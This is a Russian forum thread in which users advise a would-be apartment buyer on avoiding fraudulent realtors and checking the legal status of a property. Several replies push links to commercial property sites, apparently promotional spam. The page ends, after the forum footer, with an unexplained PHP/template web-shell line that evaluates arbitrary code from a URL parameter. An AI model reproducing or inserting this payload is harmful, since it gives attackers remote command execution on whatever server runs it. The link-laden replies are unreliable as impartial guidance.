+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Как не дать себя обмануть при сделке с недвижимостью?


  1. #1

    Как не дать себя обмануть при сделке с недвижимостью?

    Как не дать себя обмануть при сделке с недвижимостью? Не хочу попасть на черных риэлторов, хотелось бы как-то проверить с владельцем ли я вообще сделку буду осуществлять или с мошенниками. Может есть какие-то методы себя обезопасить при сделке? Хочу купить квартиру, но после ряд новостей о черных риэлторов в Москве не подготовленным не хочеться как-то рисковать.

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Если провернуть всю сделку через хорошего юриста, который если что, подвох сразу учует, то все будет гуд. А вообще, что бы уж совсем не рисковать, раз так сильно боитесь, то выбирайте квартиру через риэлторов крупных компаний, которые не первый год на рынке недвижимости.

  3. #3
    Если хочешь покупать квартиру в новостройке, то тебе переживать не стоит, конечно если сделка будет проходит с компанией застройщиком. А если на вторичном рынке, то да, лучше подстраховаться с надежным юристом.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Есть сервисы, которые предлагают услуги проверки полной истории недвижимости, например - https://egrnreestr.ru/ , они работают через Росреестр, так что все легально. Услуги конечно такие не дешевые, но зато вы будете уверены, что недвижимость которую хотите приобрести не в каком банке не заложена и точно будете знать кто владелец недвижимости и сколько вообще этих владельцев)

  5. #5
    Мимо проходил mirllall is on a distinguished road Аватар для mirllall
    Регистрация
    23.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    66
    Лучше вообще не обращаться к услугам риэлторов, я думаю, что недвижимость вторичного рынка без посредников - https://onrealt.ru/ekaterinburg/kypi...t-sobstvennika то, что надо, чтобы купить квартиру или дом у нас в стране. Главное, найти хорошего юриста-нотариуса, чтобы все проверил по недвижимости

  6. #6
    Новичок Meloun is on a distinguished road Аватар для Meloun
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    На данный момент преступления связанные с мошенничеством в сфере недвижимости одни из самых распространенных у нас в стране. Наш народ очень доверчив и юридически малограмотен. Поэтому, покупая квартиру или дом, сталкиваются с тем, что там столько подводных камней. От "левых" прописанных до того, что купили не у собственника. Так что, почитайте хотя бы тут https://avprrb.ru/articles/pokupka-n...toty-kvartiry/ о том, как проверить юридически "чистоту" квартиры перед покупкой. А потом уже совершать сделку. Иначе можно остаться и без денег, и без жилья.

  7. #7
    Мимо проходил brokko is on a distinguished road Аватар для brokko
    Регистрация
    02.10.2019
    Откуда
    Россия
    Машина
    Имеется
    Сообщений
    49
    Это точно

  8. #8
    GTI-Racing Magistral is on a distinguished road Аватар для Magistral
    Регистрация
    11.12.2010
    Откуда
    Москва
    Машина
    Golf
    Сообщений
    156
    Ничего не покупать, например

+ Ответить в теме

Похожие темы

  1. Ответов: 5
    Последнее сообщение: 07.11.2023, 11:38
  2. а если обмануть халдекс
    от ANT- в разделе Golf R
    Ответов: 21
    Последнее сообщение: 23.07.2020, 19:53
  3. GOLF-4 1.8T для себя
    от Alexand0r в разделе Покупка и продажа авто
    Ответов: 1
    Последнее сообщение: 09.07.2010, 18:36
  4. Как обмануть Г3 ? )
    от The_thing в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 0
    Последнее сообщение: 18.05.2007, 12:06
  5. Проверь себя
    от ARS в разделе Курилка
    Ответов: 4
    Последнее сообщение: 05.10.2006, 21:02

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}